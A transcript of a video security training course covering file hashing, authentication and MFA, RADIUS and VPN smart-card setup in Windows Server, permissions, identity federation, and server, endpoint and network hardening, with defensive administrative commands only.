So, if I were to run notepad now against the project1hash file, [He executes the notepad .\Project1hash
command and the project1hash - Notepad window opens.] then we would see – of course – it contains the
SHA256 algorithm listing along with the actual hash and the name and path of the file. Excellent. Notice that
the hash starts with 227AB28. So now what we're going to do is Close that up. And instead, we're going to use
notepad to open up the project1 file – that's the original data. [He executes the notepad project1 command and
the Project1.txt - Notepad window opens.] And we're going to make a change.
I'll go to another line and type "This is line two." And I'm going to go ahead and Close and Save that. And
we're going to recompute the hash again. So, to do that...and actually we're simply going to use get-filehash,
and it's going to run against Project1.txt. [He again executes the get-filehash .\Project1.txt command.] Now we
can tell immediately that we have a different returned hash value because now our current returned hash begins
with 082AC where before it started with 227AB28.
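Rather than comparing the leading characters by eye, the two values could also be compared programmatically. As a rough sketch, assuming the published or previously recorded value has been copied into a variable, a PowerShell comparison like this would return True or False:
$expected = '<expected SHA256 hash value>'
(Get-FileHash .\Project1.txt -Algorithm SHA256).Hash -eq $expected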
So we can now safely say that indeed that file has changed since we last ran the hashing algorithm because we
have a different hash-resultant value. Now you can also use this when you download files from the Internet
because some web pages will publish a hash value. And, to make sure that you downloaded the right file and
that it has not been tampered with or corrupted, you can run a hashing tool like this one to make sure you get
the same hash posted on the web site. In this video, we learned how to run file hashes in Windows.
Objectives
[Topic title: Authentication. The presenter is Dan Lachance.] In this video, we'll discuss authentication.
Authentication is a core part of Identity and Access Management. And it really means proof of identity
whether we're talking about a user, a device, or an application. Authentication has multiple categories that can
be used such as something you know. That would include something like a username and a password or a PIN.
Another category for authentication is something you have. That would include things like a PKI certificate or
a hardware or software token or even a smart card. The third category is something you are, which covers biometric authentication. This will include things like fingerprints, voice recognition, or retinal scans. Multifactor
authentication is often referred to as MFA. It's a combination of at least two authentication categories. So, for
example, something you know like a PIN and something you have like your smart card. So together you can
use that information and that device for authentication.
Multifactor authentication requires items from at least two different authentication categories; two items from the same category do not constitute MFA. So, for example, username and password are two items, but they are in the same category. They're both something you know. So therefore, username and password alone are not considered multifactor authentication.
With authentication, we need an identity store. So think of things like user accounts. Where are they stored? So
user accounts then might be stored in an LDAP-compliant database such as Microsoft Active Directory
Domain Services databases. We can also configure RADIUS authentication, which allows for a centralized
authentication provider.
Edge devices like network switches and VPN appliances will forward authentication requests from their
clients to the RADIUS server. So, in other words, edge network devices like switches, VPN appliances,
wireless routers, they would not perform authentication, instead they forward it to the RADIUS server which
does the authentication.
Identity Federation is a centralized, trusted identity provider where we have a single copy of credentials. So
applications then themselves do not perform authentication, instead they forward authentication requests to the
identity provider. In turn, the identity provider then sends a digitally signed security token to the app after
successful authentication.
Security tokens can contain what are called claims about users or devices. A claim is basically an assertion
about a user or device such as a date of birth, a department a device resides in, and so on. Identity federation is
often used for Web Single Sign-on for internal or public cloud apps so that users don't have to keep re-entering
the same credentials as they access different applications.
Finally, authentication can also be context based. So, in addition – for example – to a smart card and a PIN, we
might look at the time of day to determine if someone is allowed to authenticate or their location, which could
be based on GPS tracking or the frequency of how often they authenticate or other behavioral characteristics.
In this video, we discussed authentication.
Objectives
[Topic title: Configure MultiFactor Authentication for VPN Clients. The presenter is Dan Lachance.] In this
video, I'll demonstrate how to configure VPN multifactor authentication. Multifactor authentication can be
required for VPN connectivity. Now, if you think about it, your VPN appliance is in some way exposed to the
public Internet to allow incoming VPN connections in the first place. So usually, we want more than just
standard username and password, which constitutes single-factor authentication.
Instead, what we're going to do here is configure multifactor authentication through the use of a smart card
where the user must have the smart card in their possession and they must know the PIN in order to
authenticate to the VPN. Now, depending on your VPN solution, the specific steps will vary. We're going to do it
here in the Windows Server 2012 environment.
So, from the Start menu, I'm going to type network so that I can start the Network Policy Server tool. Now, if
you're using a Windows Server as a VPN device, then this is the software that will make it happen. Also, this is
where you configure your RADIUS server settings for centralized authentication because as we know, VPN
appliances themselves should never actually do the authentication locally, in case they get compromised.
So here in the Network Policy Server tool, [The Network Policy Server window is divided into two sections.
The left section contains the NPS (Local) node. It further includes the Policies subnode. This subnode includes
the Connection Request Policies folder. The section on the right displays the content of the folder selected in
the left section.] over on the left I'm going to expand Policies. And I'm going to go ahead and right-click after I
select Connection Request Policies. There I'm going to choose New. [The New Connection Request Policy
wizard opens. The first page is titled Specify Connection Request Policy Name and Connection Type. It
includes the Policy name text box and Type of network access server drop-down list box.] And I'm going to
call this Incoming VPN Smartcard. [He types this in the Policy name text box.] Now, down below for the Type
of network access server that this connection request policy will be used for, I'm going to choose Remote
Access Server(VPN-Dial up).
Even though my users aren't using dial-up modems, they're connecting over the Internet. And I'll click
Next. [The next page of the wizard is titled Specify Conditions. It includes the Add button.] Now here in the
Specify Conditions dialog box, I'm going to click the Add button. [The Select condition dialog box opens. It
includes the Tunnel Type option. There is the Add button at the bottom of the dialog box.] And, in this case,
notice I have got multiple criteria I can select, but I'm going to just choose the Tunnel Type. [He clicks the Add
button and the Tunnel Type dialog box opens. It includes the Common dial-up and VPN tunnel types section,
which further includes the Layer Two Tunneling Protocol (L2TP) checkbox.] I want to specifically say here
that I only accept connections here for Layer Two Tunneling Protocol (L2TP) assuming that's what my VPN
appliance is configured with because here I'm not actually configuring the VPN appliance, I'm just configuring
the requirement for multifactor authentication.
So I'm going to go ahead and click OK, and I'll click Next. [The Specify Connection Request Forwarding page
of the wizard opens. It includes the Authenticate requests on this server radio button.] Now, at the RADIUS
level, here I can determine whether authentication requests should be handled on this server, which is what I
want because this is actually my RADIUS server with Active Directory user accounts. But notice I do have the
option of forwarding requests to a different RADIUS server. Well, I would have the option if I had additional
servers. Right now it's currently grayed out.
So I'm going to go ahead and click Next on the screen. I didn't change anything. Now, on the Specify
Authentication Methods screen, this is where we're going to do the work to specify that VPN clients must use
multifactor authentication. [This page of the wizard includes the Override network policy authentication
settings checkbox.] So, to do that, I'm going to turn on the checkmark here for the option that says Override
network policy authentication settings because we're going to specify them here.
Now, under EAP Types, I'm going to click the Add button. EAP, of course, stands for Extensible
Authentication Protocol. [The Add EAP dialog box opens. It includes the Microsoft: Smart Card or other
certificate option.] And what I want to choose here is Microsoft: Smart Card or other certificate. So I'm going
to choose that and click OK. And then I'll proceed through the wizard by clicking Next. Now I don't need to
specify any other attributes. So I'll just continue through the wizard until I get to my summary screen where I
will click Finish.
[Now the content of the Connection Request Policies folder includes the Incoming VPN Smartcard policy. Its
status is Enabled and source is Remote Access Server(VPN-Dial up).] So now I've got a connection request
policy whereby it requires multifactor VPN authentication through the use of a smart card. Now this is going to
be used when we've got VPN appliances that forward RADIUS authentication requests to this device. In this
video, we learned how to configure VPN multifactor authentication.
[Topic title: Authorization. The presenter is Dan Lachance.] In this video, I'll talk about authorization.
Authorization occurs after successful authentication of a user, a device, or an application. Authorization allows
access to a resource such as a network, a web application, a file, a folder, a database, and so on. Access control
lists – or ACLs – control resource access. With authorization, it's important to adhere to the principle of least privilege, where only the permissions required to complete a job task are granted and no more. There should also be a periodic review of access privileges to ensure that they are still sufficient or, in some cases, that excessive permissions haven't accumulated. Examples of privileges would include things
like read, write, delete, the ability to modify attributes – for instance – of a file, or to insert a row in a database.
Windows NTFS standard file system permissions include full control, modify, read and execute, list folder
contents, read, write, and special permissions.
Now most of these are pretty self-explanatory. If you have full control, you can do anything you want to the
file. If you have read access, you can read the contents. However, modify and write are a little bit more of a
mystery. A big distinction between modify and write is that modify allows file deletion and write does not.
Special permissions give you a further degree of granularity. For instance, you might want to allow the
creation of folders in a certain location on a server, but not files. Now, if you use the standard permission set
such as the write permission, well that allows the creation of both folders and files. So special permissions let you get much more granular.
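As an illustration of how those standard permissions might be assigned from the command line, a sketch using the built-in icacls tool could look like this, where the folder path and group name are made up for the example:
icacls D:\Projects /grant "Sales Users":(OI)(CI)M
That would grant the Modify permission to the hypothetical Sales Users group, inherited by subfolders and files through the (OI)(CI) flags.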
In Linux standard file system permissions include read, write, and execute. Now read has a value of four, write
has a value of two, and execute has a value of one. So, for example, for the owner of a file if she had all of
these permissions, then numerically that would be four plus two plus one which equals seven.
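As a quick illustration, assuming a file named report.txt, a command such as the following would give the owner read, write, and execute (4+2+1=7), the group read and execute (4+1=5), and everyone else no access (0):
chmod 750 report.txt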
[Topic title: RADIUS, TACACS+. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
configure a Windows RADIUS server. So a RADIUS server then is a centralized authentication host. And, to
make that happen on a Windows Server 2012 R2 machine, we need to make sure we have the Network Policy
Server role installed. So, here in PowerShell on my Windows computer, I'm going to run the get-
windowsfeature command and I'm going to pad the word policy with wildcard asterisk symbols. In other
words, to get a list of Windows features that contain the word policy. [The presenter executes the get-
windowsfeature *policy* command.]
And here we can clearly see in fact that the Network Policy Server role is installed because there is an [X] in
the box. So the next thing we will do then is start the Network Policy Server GUI tool to configure the
RADIUS server. So, from my Windows Start menu, I'm going to search for the word network. And, when the
Network Policy Server tool shows up, we would go ahead and click on it.
So this is the tool then that we use when we want to configure our Network Policy Server or specifically our
Windows RADIUS server. [The Network Policy Server window opens. The window is divided into two
sections. The left section includes the RADIUS Clients and Servers folder.] So, in the Network Policy Server
tool, the first thing I'm going to do over on the left is expand the list of RADIUS Clients and Servers. Now the
idea here is I have to define one or more RADIUS Clients that will forward authentication requests to this
RADIUS server.
So, by virtue of this server having this software installed and being connected to Active Directory, it can act as
a RADIUS authentication server. So, in the left-hand navigator, I'm going to click on RADIUS Clients which
is underneath RADIUS Clients and Servers. [He selects the RADIUS Clients option under the RADIUS Clients
and Servers folder and its content is displayed in the section on the right.] And we see on the right that we
don't have any RADIUS Clients defined.
Now remember a RADIUS client is not the end user trying to connect to the network, for instance, through a
VPN, through an Ethernet switch, or through a wireless router. Instead the RADIUS client is the edge
network device like the VPN appliance or the wireless router or the Ethernet switch. So they have to be added
here so that they are known by the RADIUS server.
So we're going to right-click on RADIUS Clients and choose New. [The New RADIUS Client dialog box
opens. It includes the Name and Address section, which further includes the Friendly name and Address (IP or
DNS) text boxes. The dialog box also includes the Shared Secret section, which further includes the Shared
secret and Confirm shared secret text boxes.] And, for this first name, I'm going to call it VPN Appliance
1 [He types this in the Friendly name text box.] and I'm going to go ahead and pop in the IP address of my
VPN appliance. [He enters 200.2.35.6 in the Address (IP or DNS) text box.] Now, down below, I'm going to
manually put in a Shared secret that I have to configure on the VPN appliance. This is used for the VPN
appliance to authenticate to this RADIUS server.
So I'm going to go ahead and click OK. [As a result, the VPN Appliance 1 RADIUS Client gets added to the
content of the RADIUS Clients option.] Let's add another one. I'm going to right-click on RADIUS Clients on
the left-hand navigator again and choose New. This time I'm going to call this one wireless access point or
WAP 1. [He types this in the Friendly name text box.] And, in the same way, I'll put in the IP address. But
notice I could put in the actual DNS name of that host if it's configured. [He enters 200.34.67.4 in the Address
(IP or DNS) text box.] And, once again, I can configure either the same or a different Shared secret.
You'll notice that we can build a template where this stuff is just selectable from the list. [He points to the
Select an existing Shared Secrets template drop-down list box under the Shared Secret section.] So, if we
know we are going to configure dozens of VPN or wireless access point clients with the same Shared secret,
maybe it makes sense to build the template first. But here I've only got two. So I don't mind popping in the
same Shared secret. And I'll go ahead and click on OK. [As a result, the WAP 1 RADIUS Client gets added to
the content of the RADIUS Clients option.]
So, now at this point, we've actually got our Windows RADIUS server configured along with two RADIUS clients. Now, if we didn't have the Network Policy Server role installed, we could either use the Server Manager GUI to install it or do it here in PowerShell...let's just search for PowerShell and fire it up. Instead of the get-windowsfeature cmdlet, we would use the install-windowsfeature cmdlet followed by the name of the specific component that we wish to install.
And remember, if you are not sure about what the nomenclature is for this stuff, just go ahead and search for it like this – so get-windowfeature. Again I'm going to search for the word policy. I'm just guessing – it's
Network Policy Server. And of course you need to spell things correctly. It's get-windowsfeature, not
window. [He executes the get-windowsfeature *policy* command. The output is displayed in a tabular
form.] We can see that it's called over here under the name column NPAS-Policy-Server. So that's what we
would use with the install-windowsfeature cmdlet if we needed to install the software if it's not already there.
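Putting that together, on a server that's missing the role, the installation would look something like the following, where the optional -IncludeManagementTools switch also pulls in the management console:
install-windowsfeature NPAS-Policy-Server -IncludeManagementTools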
Objectives
[Topic title: User Provisioning and Deprovisioning. The presenter is Dan Lachance.] In most cases, accessing
a network resource requires a user account. In this video, we'll talk about user provisioning and
deprovisioning. Provisioning would be used for newly hired employees where there is a standard onboarding
process for those new hires, which would include reviewing and signing of acceptable use policies, user
awareness and training about security issues, how to conduct themselves in the corporate environment, and so
on.
Deprovisioning would involve activities such as conducting an exit interview or removing access. For
example, disabling a user account once they've left the company versus deleting their user account. We might
do that so we can still track what they did or take a look at any work they were working on. Or, in some cases,
even decrypt things that were encrypted with their user account.
Another way to remove access with user deprovisioning is to revoke an associated PKI certificate or
certificates issued to the user and/or devices that they used. For instance, if a user was issued a company
smartphone that could connect to the VPN, that smartphone might use a PKI certificate to authenticate to the
VPN. Well, if that certificate is revoked, it can't connect to the VPN anymore.
Common tasks with user provisioning and management overall down to deprovisioning include the creation of
the user account, the modification of the user account while it's in use, for instance, changing attributes such as
last name if somebody gets married or changing a password if it's forgotten. There is the disabling of a user
account. This might be done, for instance, if a user is on sick leave or parental leave. And finally of course
there is user account deletion.
Data from other human resource apps can also be used or integrated with a current solution that might be used.
For instance, we might link Active Directory user accounts with the PeopleSoft application. With user account
creation, users are normally then added to groups after they have an account. Now this is based on their
required access to resources to complete job-specific tasks.
Password policies are also a part of user provisioning, although this is normally automated. For instance, in an
Active Directory environment, we would have a domain Group Policy object that applies to everybody in the
domain so that we have the same password policy in effect. So it would include things like the minimum and
maximum password ages, a minimum password length, password complexity, and so on.
Now, that's not to say that in an Active Directory environment, you can't have password settings for different
groups of users. You can, just not through Group Policy, instead you would configure fine-grained password
policies. In some cases, it's appropriate to use self-service user provisioning where users can request an
account and they can set their own password.
An example of this that we've all come across at some point I'm sure is using a web site that requires a user
account before you can participate in the web site. So, in some cases, you will be able to create a free account
where you can also set your own password. So that's an example of self-service user provisioning.
[Topic title: Identity Federation. The presenter is Dan Lachance.] In this video, we'll talk about identity
federation. Identity federation is related to identity management where we have a centralized identity provider.
This removes the need for redundant user account information. And it also gets configured to trust relying
entities. A relying entity, for example, might be a web application server that we will authenticate user access
to.
Resources are configured to trust the identity provider. And, again, that's an example of a relying entity such as
a web application. So this is often also called a relying party. And normally what's done is the public key from
a certificate or key pair used by the identity provider is made available to the relying party.
Applications don't perform authentication, instead they forward the authentication requests from users to the
trusted identity provider for which they now have a public key. So the identity provider then sends a digitally
signed security token to the app after successful authentication for the user or device.
Now the identity provider's private key creates the signature. Apps have the public key that's related so they
can verify the signature for authenticity. Identity providers generate security tokens. The specific component on the identity provider that does this is often referred to as a Security Token Service or STS. Security tokens can contain
claims about users or devices.
Claims are assertions that are consumed by apps. So an example might be a date of birth, the department a
device resides in, a user's e-mail address, and so on. The identity provider is also often referred to as a claims
provider as a result of this. This is often used for Web Single Sign-On – SSO – for internal or public cloud
applications so that users don't have to keep providing the same credentials even though they are connecting to
different apps.
There are many benefits to using identity federation, including a reduced cost because we have a single central
identity store, reduced complexity for the same reasons, enhanced security because we're using digitally signed
tokens, and accountability because we have a central, definable point where we need to track user account
activity.
It also facilitates on-premises to cloud resource access as well as business-to-business resource access. Let's
take a look at the communication flow with identity federation. Pictured in our diagram in the center we've got
a user station with a web browser. On the left, we've got the identity provider, otherwise called the claims
provider. And, on the right, we've got the web applications, which are otherwise called relying parties.
In transmission number one, the user in their web browser attempts to connect to a web application. Now the
web application is going to be configured to trust the identity provider. So, in transmission number two, the
web application will send back a notification to the user essentially redirecting them to the identity provider.
Now that might come in many different forms, including an HTTP redirect.
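To make that a bit more concrete, in the simplest case that redirect could just be an HTTP response along these lines, where the host names and query string are made up for illustration:
HTTP/1.1 302 Found
Location: https://idp.example.com/signin?returnUrl=https%3A%2F%2Fapp.example.com%2F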
So, in transmission number three, the user web browser then – for example – uses that HTTP redirect to
connect to the identity provider where the user is then prompted to provide credentials. So, assuming the user
provides the correct credentials in transmission four from the identity provider, we would have a digitally
signed token that might contain claims – if it's configured for that – that gets sent back to the user station.
Now that could come in many forms, including a web browser cookie. So now we would have a cookie – essentially a signed security session token – that is in the possession of the user on their station. So transmission number five would be the user station web browser sending that token – which could be a cookie – to the application, which then authorizes the user to use the application.
Now, on a large scale with many web applications, this model makes a lot of sense and makes things much
easier over the long term. Common identity federation standards include OAuth – this is the open standard for
authorization – and it gives us the ability to sign in to a third-party web site after signing in to something – like
Google – only once.
SAML is the Security Assertion Markup Language. Common identity federation products include Microsoft
Active Directory Federation Services, which is usually called ADFS; Shibboleth, which is an open source SSO
solution; and OpenID, which is Internet SSO or Single Sign-On where you authenticate once to OpenID and
you are authorized from there for multiple web sites.
Objectives
[Topic title: Server Vulnerabilities. The presenter is Dan Lachance.] In this video, we'll talk about server
vulnerabilities. Servers are highly sought after by malicious users. Because, if a server exists, presumably there
are multiple people that want to connect to some kind of service that has value on it or data that resides on that
host. Servers could be physical, they could be virtual, or we could have a virtualization server – otherwise
called a hypervisor – which is a physical server that runs virtual machine guests.
We have to consider the various platforms that our server operating systems might be running. For instance,
we might be securing our Windows platform, UNIX or Linux, or maybe even a Mac OS X Server. Either way,
there are best practices and guidelines that we can follow in hardening each of those various operating systems.
We then must consider the roles each server plays because different roles will have different vulnerabilities.
So – for instance – with a file server, we have to think about the type of data that will be stored on the file
server and perhaps, for instance, it might be required that we enable multifactor authentication to safeguard
that data – maybe it's financial transaction information or maybe it's personally identifiable information. We
might even categorize the data on the file server and add more metadata to further control resource access.
In the case of a web server, we really are talking about a host supporting HTTP or HTTPS. Now, with an
application server, we're really looking at a web server that has a specific business use. So web server and
application server are similar, but the application server is more tailored to a specific business need. Now, of
course, what we want to do is make sure we're using SSL or TLS to remove any possibility of clear text
transmissions being captured by a malicious user.
DNS servers are crucial because they are a name lookup service. However, we want to make sure that DNS
servers are properly hardened so that malicious users can't poison DNS with fake entries, which would redirect
users potentially to fraudulent sites. DHCP servers should also be hardened so that their configurations cannot
be changed. But another interesting aspect of DHCP is the prevention of rogue DHCP servers on the network
that can hand out incorrect IP addresses to clients.
For that, we are looking at network access control. We have to think about our identity provider – such as
Microsoft Active Directory – to make sure that it can't be compromised since it contains credentials. And, of
course, we might take a look at a PKI server that hosts a Certificate Authority that is used to issue certificates.
So the point then is that there are different considerations when hardening different server roles.
The other thing to consider is whether these roles are collocated on a single server, which could be good or bad. Ideally, we have single-purpose servers, which makes them easier to configure, manage, and harden. Hardening means we
are increasing security. This is done through numerous methods such as applying firmware updates; patching
the server operating system; and disabling unnecessary services, apps, user accounts, and even computer
accounts.
Server hardening also includes things such as making sure that you're running an up-to-date malware scanner
and using a host-based firewall that denies all inbound and outbound traffic by default. So, in other words, we add exceptions for what should be allowed into servers or traffic that should be allowed to leave. We should also have log forwarding configured to a centralized and secured logging host elsewhere. So that, even if a server is compromised and its local logs are wiped, we still have a way to track what happened.
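On the deny-by-default firewall point, as a rough sketch on a Linux host, the default policies could be set to drop everything and then explicit exceptions added, for example allowing inbound SSH and the return traffic for established connections:
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT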
We should also enable appropriate auditing. Now what this means is making sure we don't go overboard and turn on auditing for every action for every user, because then we're overwhelmed with useless information. So, with auditing, we want to make sure we're very selective about who and what we audit. For servers that support it, we should also consider disabling the server GUI. Instead, we should manage servers remotely using GUI tools, or locally or remotely using command line tools.
Depending on the operating system your server is running, you should be following the appropriate operating
system and app configuration best practices. You should change default settings. For example, instead of
leaving the default Windows administrator account, you might rename it to something else. Encryption should
always be used. Not just out on the Internet, but internally as well for data in transit, as well as data at rest.
We should always make sure we're using strong passwords or multifactor authentication. And we should
certainly disable the use of null passwords. That's never a good idea. We should also force periodic password
changes. Up-to-date server disaster recovery plans are absolutely invaluable because they include step-by-step
procedures for things like bare metal restore of failed servers. But this only works properly if each and every
IT technician knows their role in the disaster recovery plan.
We should also establish a baseline of normal server usage for every server. And, of course, this can be
automated over time. We need to know what normal usage is on a given server in a given network environment
so that we can identify anomalies. And we might detect those by using a host-based intrusion prevention
system – otherwise called HIPS. So this would be configured specifically for our environment to detect, notify,
and stop suspicious activity.
Finally, at the physical level, we can't forget about securing our servers this way. So we might do this by
configuring things such as a power-on password that must be known when the server is powered up or a
CMOS password. And we also want to make sure that servers are always locked in a server room or in their
data center racks. We want to make sure that the data center racks have enclosures that lock as well. So we
don't want easy access to servers or the disk arrays that the servers use.
[Topic title: Endpoint Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about endpoint
vulnerabilities. When we talk about endpoint devices, we're really talking about two categories of devices.
We're talking about user devices like smartphones and laptops, but then at the same time we're also talking
about network infrastructure devices. Either way, depending on the type of solution we have – it might be
hardware or it might be software – we need to make sure we apply firmware updates or software patches to fix
any security issues.
This would apply to network infrastructure devices like network switches, VPN appliances, load balancers,
reverse proxies, network firewalls, Wi-Fi access points, servers, and network printers. For example, if we're
using wireless routers, it's important that we keep up to date with the latest firmware revisions in case they
address security vulnerabilities.
Endpoint devices, as mentioned, also include user-based devices such as smartphones or laptops and so on. So, in
the same way, we should make sure that we apply firmware updates and software patches to user based
endpoint devices. We should also limit the user's ability to change configurations and to install software, which
includes drivers as well as apps from mobile device app stores and whatnot. Now we should limit that on all
types of user based endpoint devices like desktops, laptops, tablets, and smartphones.
A demilitarized zone is the network segment where we place publicly visible servers that need to be visible
that way. So that would include things potentially like public web sites, but it can also include web sites or
FTP servers that are used only by employees. Now a good argument could be made that, if those are only for employees working from home or traveling, they should not really be publicly accessible; maybe instead they should only be available after the employee establishes a VPN connection.
So certainly we might place a VPN appliance within the demilitarized zone. So then we should also consider
the placement of a reverse proxy that listens for connections to various servers hosted elsewhere. That is also
another prime candidate for a DMZ or demilitarized zone. Strict firewall rules need to exist between the
Internet firewall and the DMZ itself.
For example, if we've got a reverse proxy listening on port 80 for a web server elsewhere, then that firewall –
between the DMZ and the Internet – should allow inbound port 80 traffic destined specifically to the reverse
proxy since it's listening for that connection. Now, in the same way, we should have a second layer of firewall rules that control traffic between the DMZ and the internal network. So, to continue our example with the reverse proxy listening on TCP port 80 for a web app, maybe our second-level firewall would allow traffic from the reverse proxy destined for an internal web server port hosted elsewhere. We should also consider the use of varying firewall products. Now why is that?
Well, generally using a variety of different types of products increases security. Because, if a malicious user
were to compromise one type of router or firewall because they have exploited a known vulnerability, that
same hack will not work on a different firewall product from a different vendor. Now, at the same time, it's a
double-edged sword, isn't it? Because it increases administrative effort.
Now you've got to track, you know, updates for firmware or perhaps software for different products. You've got
different configurations, different troubleshooting techniques, and so on. We should consider the use of
centralized RADIUS authentication servers. So endpoint network infrastructure devices should never perform
their own authentication. So we really refer here to things like VPN appliances, wireless routers, they should
not actually do the authentication.
These devices are called RADIUS clients. So a RADIUS client isn't an end user on a smartphone trying to
connect to Wi-Fi. That user would be called a supplicant. So the RADIUS client in that example would be the
wireless router. Now the problem here potentially is that, if things like wireless routers were to do the actual authentication and were compromised, they would reveal credentials. So, instead, authentication should be
forwarded from RADIUS clients to a RADIUS server.
RADIUS clients will authenticate to the RADIUS server using a shared secret that gets configured. So,
naturally to harden that, we should be using a strong shared secret over an encrypted connection. Logging is
crucial to track activity, especially after some kind of an intrusion. So, therefore, we should configure log
forwarding for endpoint network infrastructure devices so that the logs are sent elsewhere.
So, if the device is compromised, we still have a record of what occurred. Now we might configure Windows
event log subscriptions. Here, in Server 2012 R2, I'm going to go ahead and click on my Start menu in the
bottom left. I'm going to type event and I'm going to start the Windows Event Viewer tool where log
information is stored. [The Event Viewer window opens. It is divided into three sections. The left section
contains the Event Viewer (Local) node, which further includes the Subscriptions option. The section in the
middle is the content section. The section on the right is titled Actions.]
Over on the left, I'm going to click on Subscriptions where I will right-click on it and then choose Create
Subscription. [The Subscription Properties dialog box opens.] I'm going to call this Sub1. [He types this in the
Subscription name text box.] Windows subscriptions that we're configuring as of right now are used for log
forwarding for centralized logging in Windows. What I'm going to do is leave this on collector initiated. [He
points to the Collector initiated radio button under the Subscription type and source computers section.] This
server will be the collector that will periodically reach out to other hosts on the network to collect log
information.
Of course, I could click the Select Computers button in order to specify those computers that I want to gather
log information from. Down below for events to collect, I would open the drop-down list and Edit the
events. [The Query Filter dialog box opens, which includes the Event level section and Event logs drop-down
list box.] And what I might do, for instance, is say I want to collect Critical, Warning, and Error
messages. [These are some of the checkboxes in the Event level section.] Specifically, let's say from the
Windows system log. [He selects the System option in the Event logs drop-down list box.] And then after that,
I would click OK.
Now what I must do in order for this to work is enable the WinRM or Windows Remote Management service on the target computers I want to collect log information from. Now, after I've done all of this, this machine will periodically, approximately every 15 minutes, poll the configured computers that we have selected so that the log information is stored here centrally.
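As a rough sketch of those prerequisites, WinRM can be enabled on each source computer and the Windows Event Collector service configured on the collector, both from an elevated command prompt, with commands along these lines:
winrm quickconfig
wecutil qc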
We can do the same kind of thing with UNIX and Linux systems using the syslog daemon for log forwarding.
The idea is that the logs on a compromised device are absolutely meaningless because they could have been changed or wiped by an attacker. So, with centralized logging, the host that receives the logs should itself be hardened, and it should also exist on a secured internal network.
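As a minimal sketch on a Linux host running rsyslog, forwarding all messages to a central logging host could be a single line in /etc/rsyslog.conf, where the host name is made up and a single @ would send over UDP instead of TCP:
*.* @@loghost.example.com:514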
For endpoint vulnerabilities, we should also have some kind of host intrusion detection and prevention system
in place. Now we might also do it at the network level. So a host intrusion detection and prevention system is
designed to look at things that are specific to a host, like application logs. Also it has the ability to decrypt
information that arrives at the host.
Network intrusion detection and prevention systems are designed to look at network traffic for multiple hosts. But,
depending on its configuration, it may not be able to look into the details of encrypted network traffic like a
host system could. And, of course, it's always important to encrypt data transmissions and data at rest both on
internal networks and externally on the Internet.
Objectives
[Topic title: Network Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about network
vulnerabilities. The goal with network security is to allow only legitimate access to the network. Most attacks
tend to occur from inside the network. So we don't often have malicious users trying to hack in directly from
the outside. Instead, malicious users can get network access and wreak havoc in a number of ways, including
an infected USB thumb drive that a user brings into the network or users opening file attachments or clicking links that trigger malware. Even drive-by web site infections can occur where a user is simply viewing a web
site without even clicking anything.
So we need to consider all network entry points just like we would consider entry and exit points for physical
building security. This includes network switches and their wall jacks that devices plug into. So we should
always disable unused switch ports. And, for those that will be active, we should configure MAC filtering. So
only certain MAC addresses are allowed to be plugged into certain switch ports.
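The exact syntax varies by switch vendor, but as a rough sketch on a Cisco IOS-style switch, shutting down an unused port and restricting an active port to a single known MAC address might look something like this, with a made-up interface and MAC address:
interface FastEthernet0/10
 shutdown
interface FastEthernet0/11
 switchport mode access
 switchport port-security
 switchport port-security mac-address 0011.2233.4455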
Now, of course, MAC addresses can be spoofed, but this is yet another layer in our security defense. VPN
appliances should always be configured to use multifactor authentication or MFA. This is considered much
more secure and more difficult to crack than standard username and password authentication. Wireless access
points should be configured to use centralized RADIUS authentication as opposed to a preshared key
configured on the device directly.
IEEE 802.1X plays an important role with network security. This is a security standard that hardware and
software can be compliant with. So it applies to wired and wireless network access. The idea is that users and
devices need to be properly authenticated before being allowed on the network. So, this means even before
DHCP would give an IP configuration to a device, it would have to successfully authenticate first.
You may wonder how that's possible. How could a device forward an authentication request to a central server elsewhere if it doesn't even have an IP? It doesn't do it. It's the network device it connects through, like the network switch or the wireless router, that forwards the request. So, therefore, the device that's connecting doesn't actually need to have a valid IP configuration for this to work.
IEEE 802.1X devices include things like network switches, routers, VPN appliances, and wireless access
points. There is also the physical network access side of things that we want to make sure that we don't forget
about. So, as we've mentioned, we should be disabling unused wall jacks which in the end connect to switch
ports. We should control access to wall jacks even beyond MAC address filtering. So, therefore, wall jacks
should only be available within a secured building or a floor with restricted access or even behind locked doors
in certain parts of the building. That, in conjunction with disabling unused switch ports and MAC filtering, adds to
our layered security defenses. Also wiring closets must always be behind locked doors to prevent things like
wiretapping or rerouting network connections by plugging things into different locations or even plugging in
devices like rogue wireless access points.
On the Wi-Fi side of things, there are a number of things we can do to harden or secure that environment. The
first is user awareness regarding things like rogue access points. A rogue access point is simply a Wi-Fi access
point that isn't authorized to be on the network. So a malicious user could have a rogue wireless access point
that looks legitimate that users connect to. So now the malicious user is seeing all of the user traffic.
We should always apply firmware patches to our Wi-Fi routers. We should also consider disabling remote
Internet administration. We should use HTTPS administration. We should consider disabling the broadcast of
the wireless network name or the SSID. And even though MAC addresses can be spoofed, we should still
enable MAC address filtering.
Our wireless routers, of course, should never do their own authentication, instead they should forward it to a
centralized RADIUS server. And we might even consider the use of a shielded location for Wi-Fi to prevent
the radio signals from emanating beyond a specific area. Rogue network services, as we've mentioned, include
things like Wi-Fi access points and DHCP servers that can cause problems on the network.
A rogue DHCP server, for instance, could even be considered a denial-of-service attack if a malicious user gets
it on the network because it might give bogus IP information to devices so that they can't connect to anything
legitimate. Then there are misconfigurations for things like network access control lists or ACLs. These are
often called packet filtering rules.
Essentially, we want to make sure that they are set to deny all traffic by default. And so then you should make
allowances only for what is required beyond this default configuration. ARP cache poisoning is another danger
if a malicious user gets on the network. In that they could essentially spoof the default gateway or router as
being themselves so that all traffic would be forwarded through the malicious user device.
Denial-of-service attacks, as we've mentioned, come in many forms and it could include network broadcast
storms or as we've mentioned a rogue DHCP server. A distributed denial-of-service attack is a little bit
different. In that, there are multiple computers involved in the attack, such as flooding a victim host or network
with useless traffic. So, therefore, we should be using network intrusion detection and prevention systems to
detect anomalies, log and notify and ideally – with the prevention system – stop the activity from continuing if
it's suspicious.
We should encrypt all transmissions including internally on our local area networks. Now, to do that, you're
probably not going to go through configuring PKI certificates for every app. It's too much work. Instead, you
might use something like IPSec, which can apply to all traffic regardless of higher-level protocol. We should
always harden all devices on the network including things like user smartphones because a single
compromised smartphone could compromise the entire network.
